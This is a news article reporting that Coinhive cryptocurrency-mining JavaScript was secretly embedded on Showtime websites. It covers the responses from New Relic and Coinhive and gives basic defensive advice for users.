Showtime’s Web sites roped visitors’ CPU into mining cryptocurrency

Here’s the latest good reason for users to block JavaScript: if you don’t, your computer’s CPU power could be used to mine cryptocurrency without your knowledge or consent.

Cryptocurrency mining in the browser

The option to transfer the burden and cost of mining cryptocurrency on to end users through mining software has long been available. But the latest iteration of this approach does not require malware to be installed on users’ machines.

Instead, their computer’s processing power can be “enlisted” through a simple JavaScript embedded in a Web site’s code. The JavaScript keeps “mining” – i.e. calculating hashes with an algorithm called Cryptonight – until the user leaves the website or closes the tab.

This option was made available by Coinhive, a project that provides the JavaScript code to website owners and effectively pays them for implementing it. Coinhive keeps around 30% of the value of the mined Monero to keep functioning and turn a profit themselves.

It is supposed to be an alternative way for site owners to earn money, instead of doing it by showing intrusive ads. It’s meant to be a win for everybody – Web site owners, visitors, and the Coinhive team – as the mining was not supposed to be kept secret from the users.

Every technology can be used for good and bad

Unfortunately, it didn’t take long for unscrupulous actors to start compromising popular browser extensions and Web sites and outfitting them with the mining JavaScript.

The latest incident involved several Web sites of CBS’s subsidiary Showtime. According to The Register, Showtime.com and ShowtimeAnytime.com were equipped with the mining code and, for a couple of days, consumed as much as 60 percent of visitors’ CPU capacity.

The script was removed on Monday, but the question of who put it there remains. Showtime is still not commenting the incident and New Relic, a web analytics company within whose HTML comment tags the script was nestled, says they had nothing to do with the code.

“Upon reviewing our products and code, the HTML comments shown in the screenshot that are referencing newrelic were not injected by New Relic’s agents. It appears they were added to the website by its developers,” the company spokesperson said.

The Coinhive team did not reveal details about the owner of the account associated with that particular mining code, but confirmed that the email address associated with it is not an official CBS address.

What now?

Some users have been safe from this “attack” for a while, as many ad-blockers are already blocking the Coinhive script. Another easy solution is to simply disable JavaScript in your browser.

If you’re computer has slowed down, and you suspect a miner to be the reason why, you can use Task Manager (on Windows) and Activity Monitor (on Mac) to check whether CPU usage is abnormally high and, if it is, to pinpoint the cause.

As for Coinhive?

“It’s probably too late to do anything about the adblockers that already prevent our current JavaScript from loading. Instead, we will focus on a new implementation that requires an explicit opt-in from the end user to run,” the team noted in a recent blog post.

“We will verify this opt-in on our servers and will implement it in a way that it can not be circumvented. We will pledge to keep the opt-in in tact at all times, without exceptions. This way we hope to convince ad-block extensions to not block this new implementation, but instead, see it as just another JavaScript library that you can integrate on your site.”

Don't miss